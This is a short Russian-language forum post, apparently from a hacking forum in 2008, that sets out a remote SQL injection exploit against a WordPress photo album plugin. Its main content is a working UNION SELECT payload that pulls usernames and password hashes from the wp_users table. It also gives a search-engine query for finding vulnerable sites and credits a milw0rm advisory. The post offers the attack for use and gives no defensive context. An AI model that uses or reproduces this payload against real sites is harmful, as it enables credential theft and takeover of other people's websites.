17.02.2008, 03:26
|
|
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами:
10636106
Репутация:
705
|
|
Wordpress Photo album Remote SQL Injection Vulnerability
EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
Сплоит
user_name&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
зы
allinurl: page_id album "photo"
Auth S@BUN http://milw0rm.com/exploits/5135
|
|
|